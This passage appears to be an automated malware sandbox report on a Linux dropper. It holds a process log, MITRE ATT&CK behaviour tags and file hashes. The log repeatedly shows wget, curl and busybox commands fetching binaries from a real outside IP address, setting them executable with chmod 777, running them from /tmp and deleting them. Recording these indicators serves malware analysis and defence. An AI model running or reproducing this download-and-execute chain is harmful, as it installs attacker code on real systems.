/tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs./42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Executes dropped EXE
PID:1638
-
-
/bin/rmrm 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:1639
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:1640
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Writes file to tmp directory
PID:1641
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:1642
-
-
/bin/chmodchmod 777 duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- File and Directory Permissions Modification
PID:1643
-
-
/tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ./duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Executes dropped EXE
PID:1644
-
-
/bin/rmrm duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:1645
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:1646
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Writes file to tmp directory
PID:1647
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:1648
-
-
/bin/chmodchmod 777 u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- File and Directory Permissions Modification
PID:1649
-
-
/tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq./u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Executes dropped EXE
PID:1650
-
-
/bin/rmrm u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:1651
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:1652
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Writes file to tmp directory
PID:1653
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:1654
-
-
/bin/chmodchmod 777 MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- File and Directory Permissions Modification
PID:1655
-
-
/tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL./MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Executes dropped EXE
PID:1656
-
-
/bin/rmrm MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:1657
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:1658
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Writes file to tmp directory
PID:1659
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:1660
-
-
/bin/chmodchmod 777 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- File and Directory Permissions Modification
PID:1661
-
-
/tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27./9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Executes dropped EXE
PID:1662
-
-
/bin/rmrm 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:1663
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:1664
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Writes file to tmp directory
PID:1665
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:1666
-
-
/bin/chmodchmod 777 znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- File and Directory Permissions Modification
PID:1667
-
-
/tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA./znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Executes dropped EXE
PID:1668
-
-
/bin/rmrm znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:1669
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97